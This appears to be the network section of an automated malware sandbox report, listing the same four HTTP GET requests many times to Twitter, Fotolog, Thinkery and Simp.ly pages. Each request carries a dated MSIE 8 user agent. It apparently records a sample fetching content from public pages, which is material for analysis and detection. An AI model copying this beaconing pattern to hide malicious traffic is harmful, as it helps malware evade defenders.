Source: global trafficHTTP traffic detected: GET /np8j7ovqdl HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: twitter.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /vz1g3wmwu HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: www.fotolog.comConnection: Keep-AliveCache-Control: no-cacheCookie: __cfduid=d16784b15f2ba7456290599dc38431f151614033840
Source: global trafficHTTP traffic detected: GET /billywilliams/5a0170161cb602262f000d2c HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: thinkery.meConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /publish/pBn8Jt HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: simp.lyConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /np8j7ovqdl HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: twitter.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /vz1g3wmwu HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: www.fotolog.comConnection: Keep-AliveCache-Control: no-cacheCookie: __cfduid=d16784b15f2ba7456290599dc38431f151614033840
Source: global trafficHTTP traffic detected: GET /billywilliams/5a0170161cb602262f000d2c HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: thinkery.meConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /publish/pBn8Jt HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: simp.lyConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /np8j7ovqdl HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: twitter.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /vz1g3wmwu HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: www.fotolog.comConnection: Keep-AliveCache-Control: no-cacheCookie: __cfduid=d16784b15f2ba7456290599dc38431f151614033840
Source: global trafficHTTP traffic detected: GET /billywilliams/5a0170161cb602262f000d2c HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: thinkery.meConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /publish/pBn8Jt HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: simp.lyConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /np8j7ovqdl HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: twitter.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /vz1g3wmwu HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: www.fotolog.comConnection: Keep-AliveCache-Control: no-cacheCookie: __cfduid=d16784b15f2ba7456290599dc38431f151614033840
Source: global trafficHTTP traffic detected: GET /billywilliams/5a0170161cb602262f000d2c HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: thinkery.meConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /publish/pBn8Jt HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: simp.lyConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /np8j7ovqdl HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: twitter.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /vz1g3wmwu HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: www.fotolog.comConnection: Keep-AliveCache-Control: no-cacheCookie: __cfduid=d16784b15f2ba7456290599dc38431f151614033840
Source: global trafficHTTP traffic detected: GET /billywilliams/5a0170161cb602262f000d2c HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: thinkery.meConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /publish/pBn8Jt HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: simp.lyConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /np8j7ovqdl HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: twitter.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /vz1g3wmwu HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: www.fotolog.comConnection: Keep-AliveCache-Control: no-cacheCookie: __cfduid=d16784b15f2ba7456290599dc38431f151614033840
Source: global trafficHTTP traffic detected: GET /billywilliams/5a0170161cb602262f000d2c HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: thinkery.meConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /publish/pBn8Jt HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: simp.lyConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /np8j7ovqdl HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: twitter.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /vz1g3wmwu HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: www.fotolog.comConnection: Keep-AliveCache-Control: no-cacheCookie: __cfduid=d16784b15f2ba7456290599dc38431f151614033840
Source: global trafficHTTP traffic detected: GET /billywilliams/5a0170161cb602262f000d2c HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: thinkery.meConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /publish/pBn8Jt HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: simp.lyConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /np8j7ovqdl HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: twitter.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /vz1g3wmwu HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: www.fotolog.comConnection: Keep-AliveCache-Control: no-cacheCookie: __cfduid=d16784b15f2ba7456290599dc38431f151614033840
Source: global trafficHTTP traffic detected: GET /billywilliams/5a0170161cb602262f000d2c HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: thinkery.meConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /publish/pBn8Jt HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: simp.lyConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /np8j7ovqdl HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: twitter.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /vz1g3wmwu HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: www.fotolog.comConnection: Keep-AliveCache-Control: no-cacheCookie: __cfduid=d16784b15f2ba7456290599dc38431f151614033840
Source: global trafficHTTP traffic detected: GET /billywilliams/5a0170161cb602262f000d2c HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: thinkery.meConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /publish/pBn8Jt HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: simp.lyConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /np8j7ovqdl HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: twitter.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /vz1g3wmwu HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: www.fotolog.comConnection: Keep-AliveCache-Control: no-cacheCookie: __cfduid=d16784b15f2ba7456290599dc38431f151614033840
Source: global trafficHTTP traffic detected: GET /billywilliams/5a0170161cb602262f000d2c HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: thinkery.meConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /publish/pBn8Jt HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: simp.lyConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /np8j7ovqdl HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: twitter.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /vz1g3wmwu HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: www.fotolog.comConnection: Keep-AliveCache-Control: no-cacheCookie: __cfduid=d16784b15f2ba7456290599dc38431f151614033840
Source: global trafficHTTP traffic detected: GET /billywilliams/5a0170161cb602262f000d2c HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: thinkery.meConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /publish/pBn8Jt HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: simp.lyConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /np8j7ovqdl HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: twitter.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /vz1g3wmwu HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: www.fotolog.comConnection: Keep-AliveCache-Control: no-cacheCookie: __cfduid=d16784b15f2ba7456290599dc38431f151614033840
Source: global trafficHTTP traffic detected: GET /billywilliams/5a0170161cb602262f000d2c HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: thinkery.meConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /publish/pBn8Jt HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: simp.lyConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /np8j7ovqdl HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: twitter.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /vz1g3wmwu HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: www.fotolog.comConnection: Keep-AliveCache-Control: no-cacheCookie: __cfduid=d16784b15f2ba7456290599dc38431f151614033840
Source: global trafficHTTP traffic detected: GET /billywilliams/5a0170161cb602262f000d2c HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: thinkery.meConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /publish/pBn8Jt HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: simp.lyConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /np8j7ovqdl HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: twitter.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /vz1g3wmwu HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: www.fotolog.comConnection: Keep-AliveCache-Control: no-cacheCookie: __cfduid=d16784b15f2ba7456290599dc38431f151614033840
Source: global trafficHTTP traffic detected: GET /billywilliams/5a0170161cb602262f000d2c HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: thinkery.meConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /publish/pBn8Jt HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: simp.lyConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /np8j7ovqdl HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: twitter.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /vz1g3wmwu HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: www.fotolog.comConnection: Keep-AliveCache-Control: no-cacheCookie: __cfduid=d16784b15f2ba7456290599dc38431f151614033840
Source: global trafficHTTP traffic detected: GET /billywilliams/5a0170161cb602262f000d2c HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: thinkery.meConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /publish/pBn8Jt HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: simp.lyConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /np8j7ovqdl HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: twitter.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /vz1g3wmwu HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: www.fotolog.comConnection: Keep-AliveCache-Control: no-cacheCookie: __cfduid=d16784b15f2ba7456290599dc38431f151614033840
Source: global trafficHTTP traffic detected: GET /billywilliams/5a0170161cb602262f000d2c HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: thinkery.meConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /publish/pBn8Jt HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: simp.lyConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /np8j7ovqdl HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: twitter.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /vz1g3wmwu HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: www.fotolog.comConnection: Keep-AliveCache-Control: no-cacheCookie: __cfduid=d16784b15f2ba7456290599dc38431f151614033840
Source: global trafficHTTP traffic detected: GET /billywilliams/5a0170161cb602262f000d2c HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: thinkery.meConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /publish/pBn8Jt HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: simp.lyConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /np8j7ovqdl HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: twitter.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /vz1g3wmwu HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: www.fotolog.comConnection: Keep-AliveCache-Control: no-cacheCookie: __cfduid=d16784b15f2ba7456290599dc38431f151614033840
Source: global trafficHTTP traffic detected: GET /billywilliams/5a0170161cb602262f000d2c HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: thinkery.meConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /publish/pBn8Jt HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: simp.lyConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /np8j7ovqdl HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: twitter.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /vz1g3wmwu HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: www.fotolog.comConnection: Keep-AliveCache-Control: no-cacheCookie: __cfduid=d16784b15f2ba7456290599dc38431f151614033840
Source: global trafficHTTP traffic detected: GET /billywilliams/5a0170161cb602262f000d2c HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: thinkery.meConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /publish/pBn8Jt HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: simp.lyConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /np8j7ovqdl HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: twitter.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /vz1g3wmwu HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: www.fotolog.comConnection: Keep-AliveCache-Control: no-cacheCookie: __cfduid=d16784b15f2ba7456290599dc38431f151614033840
Source: global trafficHTTP traffic detected: GET /billywilliams/5a0170161cb602262f000d2c HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: thinkery.meConnection: Keep-AliveCache-Control: no-cache
